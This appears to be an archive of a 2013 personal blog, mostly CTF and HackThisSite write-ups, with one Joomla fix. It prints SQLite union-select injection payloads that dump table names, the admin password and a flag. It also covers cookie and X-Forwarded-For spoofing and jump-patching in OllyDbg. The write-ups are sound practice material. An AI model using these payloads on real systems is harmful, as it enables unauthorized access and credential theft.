This challenge is also quite simple which need you to pay more attention to what server send to and get from your browser.
What a host give us a hint is:
có 7 levels :) + Level 6-7 dùng SQLite
Level 7: Bạn phải đoán đc câu query là gì :).Hãy thử %29 %22
Các level khác: tìm hiểu PHP và Apache :).
In this challenge, i use only web browser (firefox or iceweasel) with some addons and burpsuite to modify packets before they are sent.
Let's start with the link
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/
It works!..
Basically, it seems that website is not complete. Try to open page source. Nothing special in source except there is a vertical scroll bar. Let's try to scroll down to a bottom. Here, a level 2 link is hidden here. This one is always a trick to some players.
Let's keep to level2 with the link we have in the previous level.
You're not logged in!
wtf, why aren't not logged in?There is no form for us to authenticate. There must be another way to make server believe that we are logged. One way to do this is by using cookie. We need to send cookie to server to let it know we are already logged in. Using cookie manager, a firefox addon, gives us nothing, there is no cookie store already. Next, let's check what server send to us by using live http header, another firefox's addon. (thanks ML for this hint, I dont even think that i need to examine what server send becase of my little ctf experience)
Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT
That's explain why there is no cookie stored in our browser. The job is easy now by set cookie login to 1 and set our request to server to get next level link
in level3, we do the same way as level2 instead of set login cookie to ip address which is hidden in page source of this level.
Level 4 requires more challenge than the first 3 levels. Open source page and we get an array of server variables and a hidden variable
I have to guess that to pass this level, we need to set server variable HTTP_1337 to 1337.
What you need to do this level, you need to understand what server variable is and how it gets from request. (http://www.php.net/manual/en/reserved.variables.server.php)
insert the folowing line in to request's HTTP header before it is sent to server
1337:1337
Level5 is also the same as level4. We need to change our IP address ($_SERVER['REMOTE_ADDR']) to 127.0.0.1 which seems impossible. Just using google and found interesting http://en.wikipedia.org/wiki/X-Forwarded-For
Move to the next level. This level is no more php exploit. It requires sql injection skill.
?id=1
Hello manhluat!
Try to change value to see whether there is exploitable.
?id=1'
Nothing ...
so, there may be injectable. Do some more SQLis
id=-1 union select 1,1,1;--
Hello 1!
It works! Now, it is time to exploit this level. We know this level uses SQLlite; therefore using following query to get table name
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--
Hello users!
We get the table users.
?id=-1 union select 1,username,1 from users ;--
Hello admin!
?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!
Following the link, we reach level 7.In this level 7, the host give us some hints by using %27 and % 29 which stand for " and ) character.
?id=-1
Hello!
?id=-1"
Nothing... ->There must be error with sql query
?id=-1")
Nothing...
?id=-1");--
Hello!
Ok, now we guest the query should be: select ... from ... where (id="xxx")
let's do some more
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!
ok. Now we know how to pass this level. Do as what we do in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1
Hello flag!
?id=-1") union select 1,flag,1 from flag where ("1"="1
Done.
Saturday, July 27, 2013
ctf.wargame.vn teaser round web50
There are 2 links in this challenger
- main: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/?x=
- source code: this looks like a mistake of web decoder when they leave the temp version of web source code: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/index.php~
So, firstly, just check the source code to see what this mission requires?
Open that source code link, it is a blank page. No worries, view source code (this is the most important part all all web challenger).
error_reporting(0);
$flag = file('../../flag.txt');
if ($_GET['x']==="\x01\x03\x03\x07")
echo $flag[0];
?>
It seems that main will compare x parameter with some values which are 0x01, 0x03, 0x03 and 0x07, those are hex value; hence, we need to feed that x what it requires.
To do it, we have to know how to pass hex value in web browser. We need % (percent) symbol to pass hex value. For example, %20 stands for a space ( )
Back to main link. try to feed ?x=%01%03%03%07 and we get flagWednesday, July 17, 2013
HTS App 16
First though, this app should be marked as easy.
It uses createprocess API to load a bat file which is hidden in secret place. Find that bat file will solve this application.
It uses createprocess API to load a bat file which is hidden in secret place. Find that bat file will solve this application.
HTS app 12
This application is different from the others. It does not show password up or hide it somewhere else. It creates password while running
There are 2 timers. one for display verifying password and the other for checking password.
With vbdecompiler lite, you can get address of timer_timer() function. Set breakpoint there with Ollydbg.
Try to find a condition jump which lead to message Possibly correct!
When you get there (cond jump), try to search what you need in stack. If you are not native speaker, you may need a dictionary to look for real password (like me :P)
There are 2 timers. one for display verifying password and the other for checking password.
With vbdecompiler lite, you can get address of timer_timer() function. Set breakpoint there with Ollydbg.
Try to find a condition jump which lead to message Possibly correct!
When you get there (cond jump), try to search what you need in stack. If you are not native speaker, you may need a dictionary to look for real password (like me :P)
Joomla error Warning: Invalid argument supplied for foreach() in .../libraries/joomla/database/database/mysql.php on line 383
This error made me headache for a morning.
These warnings are displayed instead of displaying articles
You can also have a problem when you login to admin panel and can not read some articles, category,..
Also, using phpmyadmin can not get table structure although you repair them.
Anyway, you can see this error when trying to save configuration file:
The problem is: tmp of mysql server is full
Solution: Clear tmp
Done!
These warnings are displayed instead of displaying articles
You can also have a problem when you login to admin panel and can not read some articles, category,..
Also, using phpmyadmin can not get table structure although you repair them.
Anyway, you can see this error when trying to save configuration file:
“The Global Configuration extension could not be found. Text filter settings have not been saved.”
Solution: Clear tmp
Done!
HTS app13
As you see the hint, to complete this application, you need to base on the time of execution.
- Bruteforce (1-999) each number.
- start with number 1, then number 2 and number 3.
- When you get 3 number, do the same with number 4 that will show you the password when all 4 numbers are matched.
Note: When i bruteforce number 4th, I have to wait forever before I realize that i need me to hit Any Key to confirm; hence, you need to take care this number.
- Bruteforce (1-999) each number.
- start with number 1, then number 2 and number 3.
- When you get 3 number, do the same with number 4 that will show you the password when all 4 numbers are matched.
Note: When i bruteforce number 4th, I have to wait forever before I realize that i need me to hit Any Key to confirm; hence, you need to take care this number.
Tuesday, July 16, 2013
HTS App10
This application is very easy to get a password.
- open app10win with vbdecompiler lite
- you will notice there are three functions but you can see only 1 button, so there will be a hidden thing.
- with ollydbg, change the address of command 1 function to that hidden function, you will get the correct password
- open app10win with vbdecompiler lite
- you will notice there are three functions but you can see only 1 button, so there will be a hidden thing.
- with ollydbg, change the address of command 1 function to that hidden function, you will get the correct password
Monday, July 15, 2013
hackthissite application 5+6
With OllyDbg
- Search for important text
- Trace the code and carefully examine what is stored in stack.
- Search for important text
- Trace the code and carefully examine what is stored in stack.
hackthissite application 4
What i need is ollydbg and vb decompiler lite
- Open app4 with vb decompiler lite
- wait until it decompiles completely
- looking for addresses of Command1_click and Command1_mousemove
- attach app4 with ollydbg and run it.
- find address of JUMP to Command1_mousemove function
- change it with JUMP to Comand1_click function
-done.
- Open app4 with vb decompiler lite
- wait until it decompiles completely
- looking for addresses of Command1_click and Command1_mousemove
- attach app4 with ollydbg and run it.
- find address of JUMP to Command1_mousemove function
- change it with JUMP to Comand1_click function
-done.
Saturday, July 13, 2013
realistic mission 15,16
what i've learnt today are:
- read source code carefully
- unzip zipped file with password without password with pkcrack
- $$var =>$($var)
- override php variable with post and get
- read source code carefully
- unzip zipped file with password without password with pkcrack
- $$var =>$($var)
- override php variable with post and get
Subscribe to:
Posts (Atom)